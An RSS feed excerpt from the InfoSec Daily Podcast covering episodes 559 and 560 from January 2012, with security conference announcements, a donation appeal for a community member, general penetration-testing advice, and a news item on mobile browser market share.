	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11th, 2012, 9 AM to 4 PM</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium Griffin Hall, Northern Kentucky University</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A nice winter evening talk with Rob Fuller (@mubix). &nbsp;Rob is a Penetration Tester in Washington DC. He is a cast member of the video podcast Hak.5 and is very active in the open source community as a thought provoker, reviewer and sometimes even a coder. He has worked on projects like nUbuntu, Jasager, and the Hak5 USB Switchblade.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-560-an-evening-with-rob-fuller-mubix/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3338/0/infosec-daily-podcast-episode-560.mp3" length="19759374" type="audio/mpeg" />
		<itunes:duration>0:41:07</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 560 for January 5, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Themson Mester,, Karthik Rangarajan and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all k[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 560 for January 5, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Themson Mester,, Karthik Rangarajan and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	NOVA Hackers Open House
	When: January 9th, 2012 at 6:00PM
	Where: ICF International, 9300 Lee Highway, Fairfax
	http://maps.google.com/maps/ms?hl=en&#38;gl=us&#38;ptab=2&#38;ie=UTF8&#38;oe=UTF8&#38;msa=0&#38;msid=104405866946229741710.00048046ec622944cab00&#38;ll=38.871786,-77.265805&#38;spn=0.003968,0.006614&#38;t=h&#38;z=18
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC. 
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Metasploit Framework Unleashed:
	When: February 11th, 2012, 9 AM to 4 PM
	Where: Digitorium Griffin Hall, Northern Kentucky University
	https://msfucincy.wordpress.com/
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	A nice winter evening talk with Rob Fuller (@mubix). &#160;Rob is a Penetration Tester in Washington DC. He is a cast member of the video podcast Hak.5 and is very active in the open source community as a thought provoker, reviewer and sometimes even a coder. He has worked on projects like nUbuntu, Jasager, and the Hak5 USB Switchblade.</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 559 &#8211; Pentest Lessons, Mobile Browsing, IE6, Anonymous, SQLi and हैकर की सेना</title>
		<link>http://www.isdpodcast.com/episode-559-pentest-lessons-mobile-browsing-ie6-anonymous-sqli-and-%e0%a4%b9%e0%a5%88%e0%a4%95%e0%a4%b0-%e0%a4%95%e0%a5%80-%e0%a4%b8%e0%a5%87%e0%a4%a8%e0%a4%be</link>
		<comments>http://www.isdpodcast.com/episode-559-pentest-lessons-mobile-browsing-ie6-anonymous-sqli-and-%e0%a4%b9%e0%a5%88%e0%a4%95%e0%a4%b0-%e0%a4%95%e0%a5%80-%e0%a4%b8%e0%a5%87%e0%a4%a8%e0%a4%be#comments</comments>
		<pubDate>Thu, 05 Jan 2012 01:55:16 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3331</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 559 for January 4, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 559 for January 4, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Know not only how to use the tool, but what the tool can/cannot do.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> ALWAYS read the Statement of Work (SOW) before you show-up on-site. &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Write down what you&#39;ve found, include the how and when* </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When you run an exploit, don&rsquo;t do it blindly. Always, always, know what the exploit does, and how it will affect the machine you&rsquo;re attacking. (deploying an &ldquo;agent&rdquo; means you`ve exploited the machine)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Very Important </span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-30685_3-57350968-264/mobile-browsing-reaches-all-time-high"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30685_3-57350968-264/mobile-browsing-reaches-all-time-high</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you haven&#39;t whipped your Web site into shape for easy viewing on small-screen devices, you&#39;d better get cracking.</span><img height="321px;" src="https://lh5.googleusercontent.com/ynX4vxO1uOTpSg8V7ltFkydmHdwzZhUHSNgMg56ig0-XDAb7wt4ib_w9KydBkMPAf-Ay1qplsSLTCn-3IeSZfp43mbZZt0RxaZAP33K52fDjeobEkaA" width="598px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mobile browsing reached its highest levels so far, 7.7 percent of total browser usage, in December.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(Credit: Net Applications)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That&#39;s because the use of mobile devices reached an all-time high in December, accounting for 7.7 percent of browser usage according to Net Applications&#39; measurements of</span><a href="http://www.netmarketshare.com/faq.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> daily visits to its network of 40,000 Web sites</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. That may still be a small fraction of total Web traffic, but it&#39;s a large and growing population in absolute numbers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tablet browsing in many ways is similar to desktop browsing; screen resolution on the dominant iPad and iPad 2 aren&#39;t that far off a laptop. But touch interfaces are different from mouse interfaces, especially when it comes to tapping buttons with precision. And smaller tablets are awkwardly in between the iPad and mobile-phone screens. It&#39;s for these reasons that there&#39;s a lot of work in retooling CSS and other Web technologies to make Web sites adjust to different screen sizes, but for now it&#39;s a tough challenge for Web programmers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Among</span><a href="http://www.netmarketshare.com/browser-market-share.aspx?qprid=1&amp;qpcustomb=1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> mobile browsers</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Apple&#39;s Safari remained the top dog with 53.3 percent of usage, a drop from 55.0 percent in November. Opera rose to 21.7 percent and Google&#39;s Android browser dipped to 15.9 percent in December, making their reversed positions in October look more like an anomaly than the new order.</span><img height="266px;" src="https://lh5.googleusercontent.com/uiAXrgL2rhB5rw8sznOTJbfyUNcmQjJwC0YttkH4z1n708zCUUuqqo29wiWeMEPnN48GplnjDbd6xYGrE9TSI6_jN9lO9WozU2uS9wRsXSlOotozIWI" width="553px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple&#39;s Safari leads mobile browser usage.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(Credit: Net Applications)</span><br />
